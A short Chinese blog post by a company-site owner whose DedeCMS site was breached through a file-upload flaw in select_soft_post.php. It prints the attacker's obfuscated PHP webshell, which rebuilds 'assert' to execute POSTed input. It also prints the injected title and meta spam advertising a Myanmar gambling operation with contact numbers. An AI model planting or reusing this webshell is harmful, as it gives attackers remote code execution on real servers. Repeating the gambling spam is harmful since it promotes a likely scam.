無意中發現自己的企業站,發現自己的網站TKD被改掉了,知道自己網站被入侵了,趕緊修補。

發現DedeCms后臺被入侵的路徑include/dialog/select_soft_post.php

1.dedecms任意文件上傳漏洞


2.我的企業站被上傳的小馬

3.關于dedemcs任意文件上傳漏洞的修復


關于入侵者上傳的代碼:

<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function  yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['a']);

這個畜生修改了我的TKD

<title>緬甸維加斯國際_18187099992維加斯集團</title>
<meta name="description" content="維加斯國際_娛樂_電話:【微信同號 181-8709-9992】-->>【維加斯點擊|注 冊】<<--緬甸維加斯國際--> 【www.wjs999.net】<<--維加斯國際-- >>〖客服在線QQ:3318840396〗開戶享受 0.9洗碼_誠招代理商微信電話_返點 10%-20%】官方直營,維加斯客服熱線電 話:18187099992 ,公平、公正、公開,詳 情咨詢加斯客服" />
<meta name="keywords" content="維加斯娛樂,緬甸維加斯注冊,緬甸維 加斯登錄,緬甸維加斯客服,緬甸維加斯電 話,維加斯客服電話,維加斯客服熱線" />

畜生啊!這是人做的事情嗎?